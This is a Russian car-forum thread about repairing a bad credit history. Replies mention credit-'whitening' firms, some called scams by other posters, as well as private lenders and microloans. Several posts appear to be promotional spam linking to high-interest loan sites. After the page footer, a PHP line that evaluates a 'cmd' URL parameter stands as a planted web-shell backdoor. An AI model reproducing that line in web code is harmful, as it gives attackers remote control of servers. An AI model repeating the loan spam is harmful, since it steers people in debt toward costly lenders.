+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя
Показано с 1 по 10 из 11

Тема: Что делать с плохой кредитной историей?


  1. #1

    Что делать с плохой кредитной историей?

    Что делать с плохой кредитной историей? Когда-то давно умудрился испоганить свою кредитную историю, теперь даже на карточке кредитный лимит не открывают, а бывает моменты, когда кредитные деньги было бы не лишним, тем более с беспроцентным периодом.

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Есть компании, которые занимаются отбеливанием плохих кредитных историй. В Яндексе вы наверняка их найдете, вот только такие услуги не за бесплатно) Готовьте деньги и не кредитные)

  3. #3
    Вы можете попробовать взять кредит у частных лиц, под расписку, причем по заниженной ставке, однако тут есть и свои минусы - риск, если не будете платить вовремя, могут возникнуть телесные проблемы.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Я вам могу предоставить целый список компаний, которые готовы предоставить кредит деньгами на карту, причем мгновенно, с круглосуточной работой и без отказа - https://zajm-na-kartu.com/ . Микрокредит в общем)) У них просто зверские проценты - я знаю, однако многие из них первый кредит предоставляют без процентов, ну или с 0.01 процент за день. В общем с копеечным процентом, так что один раз взять можно.

  5. #5
    Мимо проходил Гвалиор is on a distinguished road Аватар для Гвалиор
    Регистрация
    29.11.2018
    Сообщений
    36
    Цитата Сообщение от Serf Посмотреть сообщение
    Есть компании, которые занимаются отбеливанием плохих кредитных историй. В Яндексе вы наверняка их найдете, вот только такие услуги не за бесплатно) Готовьте деньги и не кредитные)
    Это же мошенники чистой воды, деньги возьмут и с концами. Ни в коем случае к ним не обращайтесь. Запомните, исправить или удалить информацию в базе данных никто не может

  6. #6
    Мимо проходил Rostikk is on a distinguished road Аватар для Rostikk
    Регистрация
    05.12.2018
    Сообщений
    55
    Я знаю один способ исправить плохую КИ, нужно взять займ и погасить его в короткий срок. Таким образом вы сможете улучшить свою историю. Вот тут есть сервис подбора займов онлайн https://www.getmoneyfast.ru/offer/list, там можно сравнить условия по разным организациям. Есть даже предложения безпроцентного займа

  7. #7
    Мимо проходил Кирова Валентина is on a distinguished road Аватар для Кирова Валентина
    Регистрация
    14.06.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    17
    Да уж.... и почему так происходит.... сначала люди берут кредит, а потом его выплачивать не могут.... надо ведь адекватно оценивать свои возможности

  8. #8
    Мимо проходил Матвей Ильин is on a distinguished road Аватар для Матвей Ильин
    Регистрация
    13.06.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    19
    Цитата Сообщение от Кирова Валентина Посмотреть сообщение
    Да уж.... и почему так происходит.... сначала люди берут кредит, а потом его выплачивать не могут.... надо ведь адекватно оценивать свои возможности
    Я тоже неоднократно задавался этим вопросом...Наверное просто нивелируют требования банка и не думают о завтрашнем дне. Других объяснений я просто не нахожу. Сам сейчас стою перед выбором и знаю, что кредит мне необходим. Но очень ответственно подхожу к этому вопросу. Спешить не буду. Лучше по калькулятору кредитному https://alfabank.ru/get-money/credit/calculator/ всё посчитаю и буду знать наверняка, что смогу кредит в будущем выплатить без проблем. Так и всем советую поступать, чтоб потом не было испорченных кредитных историй.

  9. #9
    Мимо проходил Глебыч is on a distinguished road Аватар для Глебыч
    Регистрация
    22.06.2019
    Откуда
    Солнечное
    Машина
    с5
    Сообщений
    29
    Сейчас это вообще не проблема, частные кредиторы с плохой историей дадут кредит

  10. #10
    Мимо проходил Тунгус is on a distinguished road Аватар для Тунгус
    Регистрация
    28.05.2019
    Сообщений
    40
    Цитата Сообщение от Кирова Валентина Посмотреть сообщение
    Да уж.... и почему так происходит.... сначала люди берут кредит, а потом его выплачивать не могут.... надо ведь адекватно оценивать свои возможности
    Так ведь в жизни всякой бывает. Можно и по своей беспечности и глупости влезть в долги, а можно все рассчитать, а потом потерять работу или другой постоянный источник дохода

+ Ответить в теме
Страница 1 из 2 1 2 ПоследняяПоследняя

Похожие темы

  1. Что делать с ЭБУ
    от xenom в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 18
    Последнее сообщение: 03.04.2024, 20:34
  2. Где что делать?
    от constantinus в разделе Украина
    Ответов: 5
    Последнее сообщение: 12.06.2010, 01:02
  3. И Что Делать?
    от bafomet в разделе Курилка
    Ответов: 17
    Последнее сообщение: 26.09.2008, 20:41
  4. Где делать ЧИП?
    от Grisha в разделе Тюнинг: двигатель, впрыск, впуск/выпуск
    Ответов: 1
    Последнее сообщение: 04.08.2007, 15:13
  5. Что делать!?
    от К в разделе Курилка
    Ответов: 11
    Последнее сообщение: 27.11.2006, 00:28

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}